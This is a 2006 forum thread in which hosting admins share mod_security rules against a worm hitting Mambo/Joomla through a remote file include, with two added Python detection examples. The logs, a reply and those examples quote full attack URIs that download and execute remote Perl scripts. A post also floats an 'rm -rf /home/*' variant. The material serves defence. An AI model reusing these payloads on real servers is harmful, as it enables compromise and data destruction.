The Community Forums


New Rootkit going around... ModSec Rules + More...

Discussion in 'Security' started by HostMerit, Jan 27, 2006.

  1. HostMerit

    Seems like a new rootkit is going around (well, many, but this one seems to be the massive one). I have made additions to my mod_security rules, made them easier to read and cleaned them up some.

    I suggest adding these new rules ASAP because on all of my servers, I'm getting many many blocked requests every hour.

    I request that if any server security expert / website uses my rules or posts them on their website / mod_security config, they please give credit where credit is due.

    See the Rules below and some corresponding URLs below that.

    My new set of mod security rules is available for download directly from:
    http://www.hostmerit.com/modsec.user.conf

    There are also new rules that I have personally found by going through Apache domlogs etc., as well as for new rootkits that are spreading, but I suggest EVERYONE add the rules below to their server ASAP.


    Code:
    # Added Jan 20 by kris from honeypot domlogs - Brand new Rootkits etc
    # Mambo/Joomla remote file include through the mosConfig_absolute_path parameter
    SecFilter "mosConfig_absolute_path"
    # Remote "tool" scripts pulled in via the include
    SecFilterSelective THE_REQUEST "tool\.gif"
    SecFilterSelective THE_REQUEST "tool25\.txt"
    # Download-and-execute chains seen in the cmd= payloads
    SecFilter "perl\x20xx\.txt"
    SecFilter "sweet-serenity\.org"
    SecFilterSelective THE_REQUEST "sess3025"
    SecFilter "mosConfig_absolute_path=http"
    SecFilter "echo\x20YYY"
    SecFilter "cmd\.gif?"
    SecFilter "\x20bash;"
    # Hosts seen serving the payloads
    SecFilter "200\.72\.130\.29"
    SecFilter "200\.207\.91\.25"
    SecFilter "62\.23\.221\.67"
    SecFilter "147\.142\.142\.24"
    SecFilter "202\.143\.140\.151"
    # Dropper names / shell sequences
    SecFilterSelective THE_REQUEST "killop"
    SecFilterSelective THE_REQUEST "\/bash;chmod"
    
    

    This is spreading quickly, and many variant versions are out there, as seen below:
    Code:
    path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 08:52:59 2006] [error] [client 213.193.214.66] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 08:53:53 2006] [error] [client 213.193.229.178] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 08:53:53 2006] [error] [client 213.193.229.178] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 08:56:04 2006] [error] [client 160.114.81.20] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 08:56:04 2006] [error] [client 160.114.81.20] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 09:26:24 2006] [error] [client 195.204.38.161] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.cuti.ch/cuti/sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
    [Thu Jan 26 09:26:25 2006] [error] [client 195.204.38.161] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.cuti.ch/cuti/sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
    [Thu Jan 26 09:26:45 2006] [error] [client 80.64.129.254] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
    [Thu Jan 26 09:26:45 2006] [error] [client 80.64.129.254] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
    [Thu Jan 26 09:27:43 2006] [error] [client 81.94.11.2] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
    [Thu Jan 26 09:27:43 2006] [error] [client 81.94.11.2] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
    [Thu Jan 26 09:30:53 2006] [error] [client 82.112.90.23] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lynx%20http://www.cuti.ch/cuti/sess3024_%20>%20sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
    [Thu Jan 26 09:30:53 2006] [error] [client 82.112.90.23] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lynx%20http://www.cuti.ch/cuti/sess3024_%20>%20sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
    [Thu Jan 26 09:33:21 2006] [error] [client 62.75.156.220] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
    
    Comments and suggestions welcome.
     
    #1 HostMerit, Jan 27, 2006
    Last edited: Jan 27, 2006
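The exploitation chain the rules above block, in working form as an added example (not code from the thread or from mod_security): URL-decode each request URI the way a WAF's anti-evasion normalization does, then flag the Mambo/Joomla mosConfig_absolute_path remote include and the fetch-then-run command chain, and pull out the include URL and downloader URL for blocklisting. The sample requests are constructed from the URIs quoted in this post and the next; the function names and regexes are the example's own.

```python
"""URL-decode request URIs and flag the Mambo/Joomla remote-include plus
fetch-and-run command chain that the mod_security rules above are aimed at.

Added example, not code from the thread or from mod_security. SAMPLE_REQUESTS
is constructed from the URIs quoted in the posts; the function names and
regexes are this example's own.
"""
import re
from urllib.parse import unquote

# Remote file include: the Mambo/Joomla path variable pointed at an external URL.
RFI_RE = re.compile(r"mosConfig_absolute_path=(https?://[^&?\s]+)", re.I)

# A downloader with its target, then a shell separator, then an interpreter or
# chmod +x: the "fetch a script into /tmp and run it" shape of every quoted hit.
DOWNLOADER = r"\b(?:wget|curl|lynx|lwp-download)\s+([^\s;|&]+)"
EXECUTOR = r"\b(?:perl|sh|bash|python|chmod\s+\+x)\s"
DOWNLOAD_RE = re.compile(DOWNLOADER, re.I)
CHAIN_RE = re.compile(DOWNLOADER + r"[^;|&\n]*[;|&]+[^;|&\n]*" + EXECUTOR, re.I)


def normalize(uri: str, rounds: int = 3) -> str:
    """URL-decode until the string stops changing (bounded), so %2f, %3b and
    double-encoded variants are matched in decoded form. A WAF performs this
    anti-evasion step before any pattern runs; here it is explicit."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def analyze(uri: str) -> dict:
    """Classify one request URI and extract the hostile URLs it carries."""
    decoded = normalize(uri)
    rfi = RFI_RE.search(decoded)
    download = DOWNLOAD_RE.search(decoded)
    chain = CHAIN_RE.search(decoded) is not None
    return {
        "decoded": decoded,
        "rfi": rfi is not None,
        "include_url": rfi.group(1) if rfi else None,
        "chain": chain,
        "downloader_url": download.group(1) if download else None,
        "suspicious": rfi is not None or chain,
    }


def scan(uris):
    """One finding per suspicious request, tagged with its index in the input."""
    findings = []
    for index, uri in enumerate(uris):
        result = analyze(uri)
        if result["suspicious"]:
            result["index"] = index
            findings.append(result)
    return findings


# Constructed sample: three hits shaped like the quoted domlog entries, then two
# benign requests (one of them the kind of image name that trips loose rules).
SAMPLE_REQUESTS = [
    "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?",
    "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lynx%20http://www.cuti.ch/cuti/sess3024_%20>%20sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?",
    "/index.php?cmd=echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop",
    "/images/CP%20Station%20Oct%2004%20002.jpg",
    "/index.php?option=com_content&Itemid=1",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding["index"], finding["include_url"], finding["downloader_url"])
```

The third sample is the fully encoded form from the next post (%2f for the slash, %3b for the semicolon); a filter on the literal text `wget ` only sees it because decoding happens first, which is why the decode step is bounded but repeated. The extracted include and downloader hosts are what the IP-based SecFilter lines above are really tracking, so pulling them out of the log rather than hand-copying them keeps the blocklist current.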
  2. simplestar

    Very well recommended mod_sec rules. I've been using them since your initial generous offering a few months ago :D and my logs, without a doubt, show they're doing a great job. I omitted a few rules because they didn't apply to my server and just got a copy of your new rules. Thank you very much for providing them to us, and I will undoubtedly speak good words of your skill. :)

    BTW I'm getting them too.
    Code:
    echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillo
     
  3. simplestar

    OMG in all that, I forgot to say 'Thank you, Kris' :eek:
     
  4. jackie46

    Most rootkits are installed via wget, perl, lynx or some other download method. Simply restricting these and a few others would stop all of the above, wouldn't it?
     
    #4 jackie46, Jan 27, 2006
    Last edited: Jan 27, 2006
  5. HostMerit

    Some yes, some no - proof of concept:

    Instead of using wget / perl to download and execute, what if they used another system binary, say rm, and did rm -rf /home/*, which would in essence clear any file chowned by nobody and chmod 777 in /home? Between galleries alone and poorly written PHP scripts, that's a lot of files.

    Regardless, it's a new way into your machine and a new way for unknown users to run shell code on your machine; personally I feel insecure with that ;)

    It's your choice :rolleyes:
     
    #5 HostMerit, Jan 27, 2006
    Last edited: Jan 28, 2006
  6. Myacen

    Cheers Kris for the updated rules.

     
  7. jackie46

    Do these work with v1.9 or are these still for 1.8?
     
  8. simplestar

    I'm using ModSec 1.9 and HostMerit's work fine.
     
  9. HostMerit

    Both. You shouldn't have issues with either; I didn't use many 1.9 features and stripped them from the public version.
     
  10. Bulent Tekcan

    When I use that conf my server load goes to 100-110 :confused:
     
  11. MMarko

    There is one universal solution to these problems. Just disable wget, lynx, gcc for all users except root.
     
  12. hmm

    I have been hit hard by this worm for the last few days... Thanks to my mod_security rules for protecting the server...

    Basically it's attacking Mambo CMS, but the problem here is... I was getting approx. 50+ attacks in less than one minute...

    and this was making my server real slow and increasing load...

    So for me the final solution was to terminate that account on the server and ask the client to point their nameservers somewhere else.. :(

    Following mod_security rule helped me...

    Code:
    SecFilterSelective THE_REQUEST "wget "
    

    but the disadvantage of mod_security is.. even after deleting the index.php file from that location, mod_security will show a 406 error rather than letting Apache show a 404....

    So these bots will never know that the file is gone.. and the attacks do not stop....

    Deep
     
  13. verdon

    That's something that's always made me a little shy of too large a set of rules. The ruleset I am using seems much simpler than HostMerit's generous contribution, and HostMerit's seem much simpler than those at gotroot.com. My server load is good. I have read lots of posts cautioning and complaining of high server loads when using something as extensive as gotroot.com's. I wish I knew how much is going to be too much :) I'm fortunate in that my company manages most of the 100 or so domains on our server, and I know for sure exactly what is and isn't installed, and don't have to worry about attacks at some specific things.

    Still... it would be nice to know how many rules is going to be too much. There are probably so many other variables in server load that you'd really have to just try and watch, and then try some more, and repeat :)
     
  14. hmm

    Actually I am also afraid to use a large ruleset because of the load problem... (still, this single wget rule also caused high load on my server)

    I use the simple ruleset provided here
     
  15. verdon

    Me too pretty much... with a couple things I picked up here and there.
     
  16. HostMerit

    If you look, some of eth0's rules were direct pulls of mine, so essentially you're still using my rules :p

    One of my servers is a Dual Xeon and has around 700 domains with no issue with this configuration; load only goes above 1 during backups and updatedb.

    I used to have a much larger config; this one is actually stripped down a lot.

    If it doesn't work for you, don't use it :D
     
  17. verdon

    Please don't misunderstand me, I appreciate your effort :) I have been looking at them and likely will try at least parts of them, if not all. They seem well thought out and are well commented. I can see which ones are probably unnecessary for my particular server, so I suppose I might as well comment them out.

    salut,
     
  18. verdon

    FYI... I've been trying the rules for a few hours now, and see no significant increase in CPU load (maybe a tiny one but negligible) or any obvious problems. Thanks Kris :)

    I did see one side effect though...

    There is a rule just below the fantastico stuff that reads
    SecFilterSelective THE_REQUEST "cp\x20"

    I discovered by coincidence that one of my clients has an old CMS that allows them to upload images for content, without cleaning spaces and such out of the names. They have a number of images in their site that just happen to be named along the lines of 'CP Station Oct 04 002.jpg' and 'CP Station Oct 04 003.jpg' and so on. These translate to 'CP%20Station%20Oct%2004%20002.jpg' at request time and trigger the mod_security block.

    So, here's an opportunity for a question...

    Is this a case I should be able to add some sort of exclusion near the top?

    regards,
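The false positive described above is a pattern-precision problem, and the way to settle it before touching the live config is to run the candidate pattern over known-good and known-bad URIs. As an added example (not from the thread or from mod_security), the posted `cp\x20` filter is compared with a tightened regex that only fires when `cp` sits where a shell command would; the image URIs follow the names described in the post, the attack URIs are constructed after the cmd= payloads quoted earlier in the thread, and `example.invalid` is a placeholder host.

```python
"""Test a mod_security pattern against known-good and known-bad request URIs
before deploying it: the posted "cp\x20" filter versus a tightened version that
only fires when "cp" appears where a shell command would.

Added example, not from the thread or from mod_security. All URIs below are
constructed: the image names follow the ones described in the post, the attack
URIs follow the cmd= payloads quoted earlier, example.invalid is a placeholder.
"""
import re
from urllib.parse import unquote

# The rule as posted: "cp" followed by a space, anywhere in the decoded request.
# Matched case-insensitively, which is how "CP%20Station" came to trigger it.
LOOSE = re.compile(r"cp\x20", re.I)

# Tightened: "cp" must start a command (first token of a parameter value or right
# after a shell separator) and carry two arguments, optionally preceded by flags.
TIGHT = re.compile(r"(?:[=;|&`]\s*|^\s*)cp\s+(?:-\S+\s+)*\S+\s+\S+", re.I)

BENIGN = [  # constructed, legitimate traffic
    "/images/CP%20Station%20Oct%2004%20002.jpg",
    "/images/CP%20Station%20Oct%2004%20003.jpg",
    "/docs/cp%20guide.html",
    "/index.php?option=com_content&Itemid=1",
]

ATTACKS = [  # constructed, shaped like the quoted cmd= payloads
    "/index.php?cmd=cd%20/tmp;cp%20/tmp/mb.txt%20/home/user/public_html/x.php",
    "/index.php?cmd=cp%20-f%20shell.txt%20index.php",
    "/index.php?cmd=wget%20http://example.invalid/x.txt%3bcp%20x.txt%20.htaccess",
]


def evaluate(pattern, benign, attacks):
    """Apply a pattern to URL-decoded URIs and report what it gets wrong:
    benign requests it would block and attacks it would let through."""
    false_positives = [u for u in benign if pattern.search(unquote(u))]
    missed = [u for u in attacks if not pattern.search(unquote(u))]
    return {"false_positives": false_positives, "missed": missed}


if __name__ == "__main__":
    for name, pattern in (("loose", LOOSE), ("tight", TIGHT)):
        print(name, evaluate(pattern, BENIGN, ATTACKS))
```

Fewer false positives is still not zero: a search query such as `q=cp a b` would match the tightened pattern as well. The robust fix is scope rather than cleverness, either restricting the filter to the parameters that can actually reach a shell, or excluding the image directory with a filter carrying the `allow` action placed above the blocking rule, which is how ModSecurity 1.x stops further filters for a request it has decided to trust.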
     
  19. Spiral

    Just a little trick I use when deleting accounts....

    I tell the server to leave the DNS for the web account that I delete and then edit the DNS file and change all IP numbers to "0.0.0.0".

    Anyone attempting to connect to that domain will get a resolution of "0.0.0.0" and since that is what is returned on DNS resolution failures, their computers will assume that no IP could be found for the domain and not even attempt any web connection to your server.

    If you just delete everything then you will still get a large amount of traffic trying to directly connect to the IP number where that site used to be located even after the site and the DNS are deleted. However, if you do what I said above then that excess traffic will taper off and disappear very quickly -- sometimes within minutes.
     
  20. HostMerit

    Why not change it to 127.0.0.1? That's what I have done to domains that were being pounded: reroute the traffic to the local server, resulting in a higher and higher CPU load for the server attacking. Seems more fun than 0.0.0.0 to me.

    :rolleyes:
     